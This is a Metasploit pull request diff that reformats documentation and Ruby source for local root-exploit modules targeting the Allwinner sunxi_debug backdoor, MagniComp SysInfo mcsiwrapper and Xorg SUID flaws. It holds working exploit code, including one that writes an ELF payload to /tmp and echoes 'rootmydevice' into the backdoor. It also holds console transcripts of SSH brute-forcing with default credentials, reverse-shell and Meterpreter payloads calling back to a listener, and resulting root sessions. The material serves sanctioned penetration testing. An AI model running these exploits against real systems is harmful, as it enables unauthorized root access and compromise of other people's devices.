### PR TITLE
modules/exploits/multi/local: Resolve Rubocop and msftidy_docs violations

### DIFF
--- a/documentation/modules/exploit/multi/local/allwinner_backdoor.md
+++ b/documentation/modules/exploit/multi/local/allwinner_backdoor.md
@@ -1,18 +1,45 @@
-## Introduction
+## Vulnerable Application
 
-Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
-Vulnerable OS: all OS images available for Orange Pis,
-				 any for FriendlyARM's NanoPi M1,
-				 SinoVoip's M2+ and M3,
-				 Cuebietech's Cubietruck +
-				 Linksprite's pcDuino8 Uno
-Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
+Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4.
 
-This module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC based devices. Implements the Allwinner privilege escalation as documented in [Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869).  It is a simple debug kernel module that, when "rootmydevice" is echoed to the process, it escalates the shell to root.
+Vulnerable OS:
 
-## Usage
+* all OS images available for Orange Pis
+* any for FriendlyARM's NanoPi M1
+* SinoVoip's M2+ and M3
+* Cuebietech's Cubietruck +
+* Linksprite's pcDuino8 Uno
 
-To use this module, you need a vulnerable device.  An Orange Pi (PC model) running Lubuntu 14.04 v0.8.0 works, but other OSes for the device (as well as other devices) are also vulnerable.
+Exploitation may be possible against Dragon (x10) and Allwinner Android tablets.
+
+This module attempts to exploit a debug backdoor privilege escalation in
+Allwinner SoC based devices. Implements the Allwinner privilege escalation
+as documented in [Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869).
+It is a simple debug kernel module that, when "rootmydevice" is echoed to
+the process, it escalates the shell to root.
+
+
+## Verification Steps
+
+To use this module, you need a vulnerable device.
+
+An Orange Pi (PC model) running Lubuntu 14.04 v0.8.0 works, but other OSes for the device (as well as other devices) are also vulnerable.
+
+1. Start `msfconsole`
+1. Get a session
+1. Do: `use exploit/multi/local/allwinner_backdoor`
+1. Do: `set SESSION [SESSION]`
+1. Do: `set LHOST [LHOST]`
+1. Do: `run`
+1. You should get a new *root* session
+
+
+## Options
+
+
+## Scenarios
+
+### Orange PI running Ubuntu 14.04 (Linux 3.4.39)
 
 - `use auxiliary/scanner/ssh/ssh_login`
 
@@ -26,7 +53,8 @@ rhosts => 192.168.2.21
 msf auxiliary(ssh_login) > exploit
 
 [*] 192.168.2.21:22 SSH - Starting bruteforce
-[+] 192.168.2.21:22 SSH - Success: 'orangepi:orangepi' 'uid=1001(orangepi) gid=1001(orangepi) groups=1001(orangepi),27(sudo),29(audio) Linux orangepi 3.4.39 #41 SMP PREEMPT Sun Jun 21 13:09:26 HKT 2015 armv7l armv7l armv7l GNU/Linux '
+[+] 192.168.2.21:22 SSH - Success: 'orangepi:orangepi' 'uid=1001(orangepi) gid=1001(orangepi) groups=1001(orangepi),27(sudo),29(audio)
+Linux orangepi 3.4.39 #41 SMP PREEMPT Sun Jun 21 13:09:26 HKT 2015 armv7l armv7l armv7l GNU/Linux '
 [!] No active DB -- Credential data will not be saved!
 [*] Command shell session 1 opened (192.168.2.229:33673 -> 192.168.2.21:22) at 2016-05-17 21:55:27 -0400
 [*] Scanned 1 of 1 hosts (100% complete)
@@ -49,7 +77,7 @@ msf exploit(allwinner_backdoor) > check
 msf exploit(allwinner_backdoor) > exploit
 ```
 
-## Successful exploitation:
+Successful exploitation:
 
 ```
 [*] Started reverse TCP handler on 192.168.2.117:4444

--- a/documentation/modules/exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc.md
+++ b/documentation/modules/exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc.md
@@ -1,81 +1,82 @@
-## Description
-
-  This module attempts to gain root privileges on systems running MagniComp SysInfo versions prior to 10-H64.
-
-
 ## Vulnerable Application
 
-  [MagniComp SysInfo](https://www.magnicomp.com/sysinfo/) is a single system agent and viewer providing extensive IT asset inventory and configuration information for most major Linux, UNIX, Apple Macintosh, and Microsoft Windows platforms as well as leading NAS and SAN Storage Systems and logical volume software solutions.
+This module attempts to gain root privileges on systems running
+MagniComp SysInfo versions prior to 10-H64.
 
-  The `.mcsiwrapper` suid executable allows loading a config file using the `--configfile` argument. The `ExecPath` config directive is used to set the executable load path. This module abuses this functionality to set the load path resulting in execution of arbitrary code as root.
+[MagniComp SysInfo](https://www.magnicomp.com/sysinfo/) is a single system
+agent and viewer providing extensive IT asset inventory and configuration
+information for most major Linux, UNIX, Apple Macintosh, and Microsoft
+Windows platforms as well as leading NAS and SAN Storage Systems and
+logical volume software solutions.
 
-  This module has been tested successfully on SysInfo:
+The .mcsiwrapper suid executable allows loading a config file using the
+'--configfile' argument. The 'ExecPath' config directive is used to set
+the executable load path. This module abuses this functionality to set
+the load path resulting in execution of arbitrary code as root.
 
-  * 10-GA on Solaris 10u11 x86
-  * 10-H10 on Debian 8 x86_64
-  * 10-H32 on Fedora 27 x86_64
-  * 10-H63 on Fedora 20 x86_64
+This module has been tested successfully on SysInfo versions:
 
+* 10-GA on Solaris 10u11 x86
+* 10-H10 on Debian 8 x86_64
+* 10-H32 on Fedora 27 x86_64
+* 10-H63 on Fedora 20 x86_64
 
-  Installers:
+Installers:
 
-  * https://www.magnicomp.com/cgi-bin/mcdownload.cgi
-  * https://www.magnicomp.com/cgi-bin/mcdownload.cgi/Action=ListDDF
+* https://www.magnicomp.com/cgi-bin/mcdownload.cgi
+* https://www.magnicomp.com/cgi-bin/mcdownload.cgi/Action=ListDDF
 
 
 ## Verification Steps
 
-  1. Start `msfconsole`
-  2. Get a session
-  3. Do: `use exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc`
-  4. Do: `set SESSION [SESSION]`
-  5. Do: `check`
-  6. Do: `run`
-  7. You should get a new *root* session
+1. Start `msfconsole`
+1. Get a session
+1. Do: `use exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc`
+1. Do: `set SESSION [SESSION]`
+1. Do: `check`
+1. Do: `run`
+1. You should get a new *root* session
 
 
 ## Options
 
-  **SESSION**
+### SYSINFO_DIR
 
-  Which session to use, which can be viewed with `sessions`
+Path to SysInfo directory (default: `/opt/sysinfo`)
 
-  **SYSINFO_DIR**
+### WritableDir
 
-  Path to SysInfo directory (default: `/opt/sysinfo`)
-
-  **WritableDir**
-
-  A writable directory file system path. (default: `/tmp`)
+A writable directory file system path. (default: `/tmp`)
 
 
 ## Scenarios
 
-  ```
-  msf > use exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc 
-  msf exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > set session 1
-  session => 1
-  msf exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > run
+### MagniComp SysInfo version 10-H63 on Fedora 20 x86_64
 
-  [*] Started reverse TCP handler on 172.16.191.244:4444 
-  [*] Using target: Linux
-  [*] Writing '/tmp/.0rk4PC/vFdxxuBVkh' (21 bytes) ...
-  [*] Writing '/tmp/.0rk4PC/eoGVzYwGa' (207 bytes) ...
-  [*] Executing payload...
-  [*] Sending stage (857352 bytes) to 172.16.191.137
-  [*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.137:42229) at 2018-02-05 07:38:35 -0500
-  [+] Deleted /tmp/.0rk4PC/vFdxxuBVkh
-  [+] Deleted /tmp/.0rk4PC/eoGVzYwGa
-  [+] Deleted /tmp/.0rk4PC
+```
+msf > use exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
+msf exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > set session 1
+session => 1
+msf exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > run
 
-  meterpreter > getuid
-  Server username: uid=0, gid=1000, euid=1000, egid=1000
-  meterpreter > sysinfo
-  Computer     : localhost.localdomain
-  OS           : Fedora 20 (Linux 3.19.8-100.fc20.x86_64)
-  Architecture : x64
-  BuildTuple   : i486-linux-musl
-  Meterpreter  : x86/linux
-  meterpreter > 
-  ```
+[*] Started reverse TCP handler on 172.16.191.244:4444
+[*] Using target: Linux
+[*] Writing '/tmp/.0rk4PC/vFdxxuBVkh' (21 bytes) ...
+[*] Writing '/tmp/.0rk4PC/eoGVzYwGa' (207 bytes) ...
+[*] Executing payload...
+[*] Sending stage (857352 bytes) to 172.16.191.137
+[*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.137:42229) at 2018-02-05 07:38:35 -0500
+[+] Deleted /tmp/.0rk4PC/vFdxxuBVkh
+[+] Deleted /tmp/.0rk4PC/eoGVzYwGa
+[+] Deleted /tmp/.0rk4PC
 
+meterpreter > getuid
+Server username: uid=0, gid=1000, euid=1000, egid=1000
+meterpreter > sysinfo
+Computer     : localhost.localdomain
+OS           : Fedora 20 (Linux 3.19.8-100.fc20.x86_64)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter >
+```

--- a/documentation/modules/exploit/multi/local/xorg_x11_suid_server.md
+++ b/documentation/modules/exploit/multi/local/xorg_x11_suid_server.md
@@ -1,50 +1,54 @@
-## Description
-
-  This module attempts to gain root privileges using Xorg X11 server versions 1.19.0 < 1.20.3 set as SUID.  A permission check flaw exists for -modulepath and -logfile options when starting Xorg.  This flaw allows users to write over existing files on the system.  This exploit backs up crontab and then uses -logfile to overwrite it.  A command to be run is set for the Font Path argument -fp which will be logged and ran by cron.
-
-
 ## Vulnerable Application
 
-  Xorg (commonly referred as simply X) is the most popular display server among Linux users. Its ubiquity has led to making it an ever-present requisite for GUI applications, resulting in massive adoption from most distributions.
+This module attempts to gain root privileges using Xorg X11 server versions 1.19.0 < 1.20.3 set as SUID.
+A permission check flaw exists for -modulepath and -logfile options when starting Xorg.
+This flaw allows users to write over existing files on the system.
+This exploit backs up crontab and then uses -logfile to overwrite it.
+A command to be run is set for the Font Path argument -fp which will be logged and ran by cron.
 
-  Xorg is more restrictive to exploit under CentOS / RHEL.  The user must have console lock and SeLinux may interfere.  If Selinux is enforcing crontabs context will be changed on exploit and you will be unable to clean it.
+Xorg (commonly referred as simply X) is the most popular display server among Linux users.
+Its ubiquity has led to making it an ever-present requisite for GUI applications,
+resulting in massive adoption from most distributions.
 
-  This module has been tested successfully on:
+Xorg is more restrictive to exploit under CentOS / RHEL. The user must have console lock and SeLinux may interfere.
+If Selinux is enforcing crontabs context will be changed on exploit and you will be unable to clean it.
 
-  * OpenBSD 6.3
-  * OpenBSD 6.4
-  * CentOS 7.4.1708 x86_64
-  * CentOS 7.5.1084 x86_64
-  * Red Hat Enterprise Linux 7.5 x86_64
+This module has been tested successfully on:
+
+* OpenBSD 6.3
+* OpenBSD 6.4
+* CentOS 7.4.1708 x86_64
+* CentOS 7.5.1084 x86_64
+* Red Hat Enterprise Linux 7.5 x86_64
 
 
 ## Verification Steps
 
-  On CentOS/RHEL your session must have console lock.  To get a console lock you can login locally with a user.
+On CentOS/RHEL your session must have console lock.  To get a console lock you can login locally with a user.
 
-  1. Start `msfconsole`
-  2. Get a session
-  3. Do: `use exploit/multi/local/xorg_x11_suid_server`
-  4. Do: Set a payload/target or use default(cmd/unix/reverse_openssl)
-  5. Do: `set SESSION [SESSION]`
-  6. Do: `set LHOST [LHOST]`
-  7. Do: `run`
-  8. You should get a new *root* session
+1. Start `msfconsole`
+2. Get a session
+3. Do: `use exploit/multi/local/xorg_x11_suid_server`
+4. Do: Set a payload/target or use default(cmd/unix/reverse_openssl)
+5. Do: `set SESSION [SESSION]`
+6. Do: `set LHOST [LHOST]`
+7. Do: `run`
+8. You should get a new *root* session
 
 
-## Advanced Options
+## Options
 
-  **Xdisplay**
+### Xdisplay
 
-  Display to use for Xorg (default: `:1`)
+Display to use for Xorg (default: `:1`)
 
-  **WritableDir**
+### WritableDir
 
-  A writable directory file system path (default: `/tmp`)
+A writable directory file system path (default: `/tmp`)
 
-  **ConsoleLock**
-   
-  Will check for console lock under linux (default: `true`)
+### ConsoleLock
+
+Will check for console lock under linux (default: `true`)
 
 
 ## Scenarios
@@ -186,4 +190,3 @@ Linux red-hat-7-5-x64.local 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT
 cat /etc/redhat-release
 Red Hat Enterprise Linux Server release 7.5 (Maipo)
 ```
-

--- a/documentation/modules/exploit/multi/local/xorg_x11_suid_server_modulepath.md
+++ b/documentation/modules/exploit/multi/local/xorg_x11_suid_server_modulepath.md
@@ -1,115 +1,136 @@
 ## Vulnerable Application
 
-  For Xorg server versions below `v1.20.3`, there is an incorrect permissions
-  check when starting Xorg with the `-modulepath` flag. That combined with Xorg
-  being an SUID binary, users can execute arbitrary code as root.
+For Xorg server versions below `v1.20.3`, there is an incorrect permissions
+check when starting Xorg with the `-modulepath` flag. That combined with Xorg
+being an SUID binary, users can execute arbitrary code as root.
+
 
 ## Verification Steps
 
-  1. Install the application
-  2. Start msfconsole
-  3. Do: ```use exploit/multi/local/xorg_x11_suid_server_modulepath```
-  4. Do: ```set SESSION <sess_no>```
-  5. Do: ```set TARGET <target_no>```
-  6. Do: ```run```
-  7. You should get a shell with root privileges.
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/multi/local/xorg_x11_suid_server_modulepath`
+4. Do: `set SESSION <sess_no>`
+5. Do: `set TARGET <target_no>`
+6. Do: `run`
+7. You should get a shell with root privileges.
+
+
+## Options
+
+### Xdisplay
+
+Display to use for Xorg (default: `:1`)
+
+### WritableDir
+
+A writable directory file system path (default: `/tmp`)
+
+### ConsoleLock
+
+Will check for console lock under linux (default: `true`)
+
+### sofile
+
+Xorg shared object name for modulepath (default: `libglx.so`)
+
 
 ## Scenarios
 
 ### Xorg `v1.19.3` on Centos 7.4
 
-  ```
-  msf5 exploit(multi/handler) > run
+```
+msf5 exploit(multi/handler) > run
 
-  [*] Started reverse TCP handler on 172.16.215.1:4444
-  [*] Sending stage (816260 bytes) to 172.16.215.159
-  [*] Meterpreter session 1 opened (172.16.215.1:4444 -> 172.16.215.159:52816) at 2019-10-22 09:50:42 -0500
+[*] Started reverse TCP handler on 172.16.215.1:4444
+[*] Sending stage (816260 bytes) to 172.16.215.159
+[*] Meterpreter session 1 opened (172.16.215.1:4444 -> 172.16.215.159:52816) at 2019-10-22 09:50:42 -0500
 
-  meterpreter > getuid
-  Server username: uid=1000, gid=1000, euid=1000, egid=1000
-  meterpreter > sysinfo
-  Computer     : localhost.localdomain
-  OS           : CentOS 7.4.1708 (Linux 3.10.0-693.el7.x86_64)
-  Architecture : x64
-  BuildTuple   : x86_64-linux-musl
-  Meterpreter  : x64/linux
-  meterpreter > background
-  [*] Backgrounding session 1...
-  msf5 exploit(multi/handler) > use exploit/multi/local/xorg_x11_suid_server_modulepath
-  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set session 1
-  session => 1
-  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set payload linux/x64/meterpreter/reverse_tcp
-  payload => linux/x64/meterpreter/reverse_tcp
-  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set lhost 172.16.215.1
-  lhost => 172.16.215.1
-  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > check
-  [+]  The target is vulnerable.
-  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > run
+meterpreter > getuid
+Server username: uid=1000, gid=1000, euid=1000, egid=1000
+meterpreter > sysinfo
+Computer     : localhost.localdomain
+OS           : CentOS 7.4.1708 (Linux 3.10.0-693.el7.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > background
+[*] Backgrounding session 1...
+msf5 exploit(multi/handler) > use exploit/multi/local/xorg_x11_suid_server_modulepath
+msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set session 1
+session => 1
+msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set lhost 172.16.215.1
+lhost => 172.16.215.1
+msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > check
+[+]  The target is vulnerable.
+msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > run
 
-  [*] Started reverse TCP handler on 172.16.215.1:4444
-  [+] Passed all initial checks for exploit
-  [*] Writing launcher and compiling
-  [*] Uploading your payload, this could take a while
-  [*] Exploiting
-  [*] Sending stage (816260 bytes) to 172.16.215.159
-  [*] Meterpreter session 2 opened (172.16.215.1:4444 -> 172.16.215.159:52818) at 2019-10-22 09:51:38 -0500
-  [+] Deleted /tmp/libglx.so
-  [+] Deleted /tmp/.session-xehPZXcIrZ
+[*] Started reverse TCP handler on 172.16.215.1:4444
+[+] Passed all initial checks for exploit
+[*] Writing launcher and compiling
+[*] Uploading your payload, this could take a while
+[*] Exploiting
+[*] Sending stage (816260 bytes) to 172.16.215.159
+[*] Meterpreter session 2 opened (172.16.215.1:4444 -> 172.16.215.159:52818) at 2019-10-22 09:51:38 -0500
+[+] Deleted /tmp/libglx.so
+[+] Deleted /tmp/.session-xehPZXcIrZ
 
-  meterpreter > getuid
-  Server username: uid=0, gid=0, euid=0, egid=0
-  meterpreter > sysinfo
-  Computer     : localhost.localdomain
-  OS           : CentOS 7.4.1708 (Linux 3.10.0-693.el7.x86_64)
-  Architecture : x64
-  BuildTuple   : x86_64-linux-musl
-  Meterpreter  : x64/linux
-  ```
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+meterpreter > sysinfo
+Computer     : localhost.localdomain
+OS           : CentOS 7.4.1708 (Linux 3.10.0-693.el7.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
 
 ### Xorg `v1.19.5` on Solaris 11.4
 
-  ```
-  msf5 exploit(multi/handler) > run
+```
+msf5 exploit(multi/handler) > run
 
-  [*] Started reverse TCP handler on 172.16.215.1:4444
-  [*] Command shell session 3 opened (172.16.215.1:4444 -> 172.16.215.152:49722) at 2019-10-22 09:27:45 -0500
+[*] Started reverse TCP handler on 172.16.215.1:4444
+[*] Command shell session 3 opened (172.16.215.1:4444 -> 172.16.215.152:49722) at 2019-10-22 09:27:45 -0500
 
-  whoami
-  space
-  uname -a
-  SunOS solaris 5.11 11.4.0.15.0 i86pc i386 i86pc
-  background
+whoami
+space
+uname -a
+SunOS solaris 5.11 11.4.0.15.0 i86pc i386 i86pc
+background
 
-  Background session 3? [y/N]  y
+Background session 3? [y/N]  y
 
-  msf5 exploit(multi/handler) > use exploit/multi/local/xorg_x11_suid_server_modulepath 
-  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set payload cmd/unix/reverse_ksh
-  payload => cmd/unix/reverse_ksh
-  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set lhost 172.16.215.1
-  lhost => 172.16.215.1
-  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set session 3
-  session => 3
-  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set target 2
-  target => 2
-  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > check
+msf5 exploit(multi/handler) > use exploit/multi/local/xorg_x11_suid_server_modulepath
+msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set payload cmd/unix/reverse_ksh
+payload => cmd/unix/reverse_ksh
+msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set lhost 172.16.215.1
+lhost => 172.16.215.1
+msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set session 3
+session => 3
+msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set target 2
+target => 2
+msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > check
 
-  [!] SESSION may not be compatible with this module.
-  [+]  The target is vulnerable.
-  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > run
+[!] SESSION may not be compatible with this module.
+[+]  The target is vulnerable.
+msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > run
 
-  [!] SESSION may not be compatible with this module.
-  [*] Started reverse TCP handler on 172.16.215.1:4444 
-  [+] Passed all initial checks for exploit
-  [*] Writing launcher and compiling
-  [*] Uploading your payload, this could take a while
-  [*] Exploiting
-  [*] Command shell session 4 opened (172.16.215.1:4444 -> 172.16.215.152:57420) at 2019-10-22 09:30:05 -0500
-  [+] Deleted /tmp/qHkvGfpTTu.c
-  [+] Deleted /tmp/libglx.so
-  [+] Deleted /tmp/.session-jRlZ4zPfO
+[!] SESSION may not be compatible with this module.
+[*] Started reverse TCP handler on 172.16.215.1:4444
+[+] Passed all initial checks for exploit
+[*] Writing launcher and compiling
+[*] Uploading your payload, this could take a while
+[*] Exploiting
+[*] Command shell session 4 opened (172.16.215.1:4444 -> 172.16.215.152:57420) at 2019-10-22 09:30:05 -0500
+[+] Deleted /tmp/qHkvGfpTTu.c
+[+] Deleted /tmp/libglx.so
+[+] Deleted /tmp/.session-jRlZ4zPfO
 
-  whoami
-  root
-  uname -a
-  SunOS solaris 5.11 11.4.0.15.0 i86pc i386 i86pc
-  ```
+whoami
+root
+uname -a
+SunOS solaris 5.11 11.4.0.15.0 i86pc i386 i86pc
+```

--- a/modules/exploits/multi/local/allwinner_backdoor.rb
+++ b/modules/exploits/multi/local/allwinner_backdoor.rb
@@ -11,72 +11,80 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::EXE
 
   def initialize(info = {})
-    super(update_info(info,
-        "Name"           => "Allwinner 3.4 Legacy Kernel Local Privilege Escalation",
-        "Description"    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Allwinner 3.4 Legacy Kernel Local Privilege Escalation',
+        'Description' => %q{
           This module attempts to exploit a debug backdoor privilege escalation in
           Allwinner SoC based devices.
-          Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
+
+          Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4.
+
           Vulnerable OS: all OS images available for Orange Pis,
-                         any for FriendlyARM's NanoPi M1,
-                         SinoVoip's M2+ and M3,
-                         Cuebietech's Cubietruck +
-                         Linksprite's pcDuino8 Uno
-          Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
+          any for FriendlyARM's NanoPi M1,
+          SinoVoip's M2+ and M3,
+          Cuebietech's Cubietruck +
+          Linksprite's pcDuino8 Uno.
+          Exploitation may be possible against Dragon (x10) and Allwinner Android tablets.
         },
-        "License"        => MSF_LICENSE,
-        "Author"         =>
-          [
-            "h00die <mike@stcyrsecurity.com>",  # Module
-            "KotCzarny"                         # Discovery
-          ],
-        "Platform"       => [ "android", "linux" ],
-        "DisclosureDate" => '2016-04-30',
-        "DefaultOptions" => {
-          "payload" => "linux/armle/meterpreter/reverse_tcp"
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die <mike@stcyrsecurity.com>', # Module
+          'KotCzarny' # Discovery
+        ],
+        'Platform' => [ 'android', 'linux' ],
+        'DisclosureDate' => '2016-04-30',
+        'DefaultOptions' => {
+          'payload' => 'linux/armle/meterpreter/reverse_tcp'
         },
-        "Privileged"     => true,
-        "Arch"           => ARCH_ARMLE,
-        "References"     =>
+        'Privileged' => true,
+        'Arch' => ARCH_ARMLE,
+        'References' => [
+          [ 'CVE', '2016-10225' ],
+          [ 'URL', 'http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/'],
           [
-            [ "CVE", "2016-10225" ],
-            [ "URL", "http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/"],
-            [ "URL", "https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:" \
-                     "https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us"],
-            [ "URL", "http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390"]
+            'URL', 'https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:' \
+                   'https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us'
           ],
-        "SessionTypes"   => [ "shell", "meterpreter" ],
-        'Targets'        =>
-          [
-            [ 'Auto',           { } ]
-          ],
-        'DefaultTarget'  => 0,
-      ))
+          [ 'URL', 'http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390']
+        ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' => [
+          [ 'Auto', {} ]
+        ],
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+        },
+        'DefaultTarget' => 0
+      )
+    )
   end
 
   def check
     backdoor = '/proc/sunxi_debug/sunxi_debug'
+
     if file_exist?(backdoor)
-      Exploit::CheckCode::Appears
-    else
-      Exploit::CheckCode::Safe
+      return CheckCode::Appears("#{backdoor} exists")
     end
+
+    CheckCode::Safe("Backdoor #{backdoor} not found")
   end
 
   def exploit
     backdoor = '/proc/sunxi_debug/sunxi_debug'
-    if file_exist?(backdoor)
-      pl = generate_payload_exe
 
-      exe_file = "/tmp/#{rand_text_alpha(5)}.elf"
-      vprint_good "Backdoor Found, writing payload to #{exe_file}"
-      write_file(exe_file, pl)
-      cmd_exec("chmod +x #{exe_file}")
+    fail_with(Failure::NotVulnerable, "Backdoor #{backdoor} not found.") unless file_exist?(backdoor)
 
-      vprint_good 'Escalating'
-      cmd_exec("echo rootmydevice > #{backdoor}; #{exe_file}")
-    else
-      print_error "Backdoor #{backdoor} not found."
-    end
+    pl = generate_payload_exe
+    exe_file = "/tmp/#{rand_text_alpha(5)}.elf"
+    vprint_good "Backdoor Found, writing payload to #{exe_file}"
+    write_file(exe_file, pl)
+    cmd_exec("chmod +x #{exe_file}")
+
+    vprint_good('Escalating')
+    cmd_exec("echo rootmydevice > #{backdoor}; #{exe_file}")
   end
 end

--- a/modules/exploits/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc.rb
+++ b/modules/exploits/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc.rb
@@ -9,59 +9,61 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::File
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'MagniComp SysInfo mcsiwrapper Privilege Escalation',
-      'Description'    => %q{
-        This module attempts to gain root privileges on systems running
-        MagniComp SysInfo versions prior to 10-H64.
+    super(
+      update_info(
+        info,
+        'Name' => 'MagniComp SysInfo mcsiwrapper Privilege Escalation',
+        'Description' => %q{
+          This module attempts to gain root privileges on systems running
+          MagniComp SysInfo versions prior to 10-H64.
 
-        The .mcsiwrapper suid executable allows loading a config file using the
-        '--configfile' argument. The 'ExecPath' config directive is used to set
-        the executable load path. This module abuses this functionality to set
-        the load path resulting in execution of arbitrary code as root.
+          The .mcsiwrapper suid executable allows loading a config file using the
+          '--configfile' argument. The 'ExecPath' config directive is used to set
+          the executable load path. This module abuses this functionality to set
+          the load path resulting in execution of arbitrary code as root.
 
-        This module has been tested successfully with SysInfo version
-        10-H63 on Fedora 20 x86_64, 10-H32 on Fedora 27 x86_64, 10-H10 on
-        Debian 8 x86_64, and 10-GA on Solaris 10u11 x86.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+          This module has been tested successfully with SysInfo version
+          10-H63 on Fedora 20 x86_64, 10-H32 on Fedora 27 x86_64, 10-H10 on
+          Debian 8 x86_64, and 10-GA on Solaris 10u11 x86.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Daniel Lawson', # Discovery and exploit
           'Romain Trouve', # Discovery and exploit
-          'bcoles'  # Metasploit
+          'bcoles' # Metasploit
         ],
-      'DisclosureDate' => '2016-09-23',
-      'Platform'       => %w(linux solaris),
-      'Arch'           => [ ARCH_X86, ARCH_X64 ],
-      'SessionTypes'   => [ 'shell', 'meterpreter' ],
-      'Targets'        =>
-        [
-          [ 'Automatic', { } ],
+        'DisclosureDate' => '2016-09-23',
+        'Platform' => %w[linux solaris],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' => [
+          [ 'Automatic', {} ],
           [ 'Solaris', { 'Platform' => 'solaris', 'Arch' => ARCH_X86 } ],
-          [ 'Linux', { 'Platform' => 'linux', 'Arch' => [ ARCH_X86, ARCH_X64 ]} ]
+          [ 'Linux', { 'Platform' => 'linux', 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]
         ],
-      'References'     =>
-        [
+        'References' => [
           [ 'CVE', '2017-6516' ],
           [ 'BID', '96934' ],
           [ 'URL', 'http://www.magnicomp.com/support/cve/CVE-2017-6516.shtml' ],
           [ 'URL', 'https://labs.mwrinfosecurity.com/advisories/magnicomps-sysinfo-root-setuid-local-privilege-escalation-vulnerability/' ],
           [ 'URL', 'https://labs.mwrinfosecurity.com/advisories/multiple-vulnerabilities-in-magnicomps-sysinfo-root-setuid/' ]
         ],
-      'Notes'          =>
-        {
+        'Notes' => {
           'Reliability' => [ REPEATABLE_SESSION ],
-          'Stability'   => [ CRASH_SAFE ]
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
         }
-    ))
-    register_options(
-      [
-        OptString.new('SYSINFO_DIR', [ true, 'Path to SysInfo directory', '/opt/sysinfo' ]),
-        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
-      ])
+      )
+    )
+    register_options([
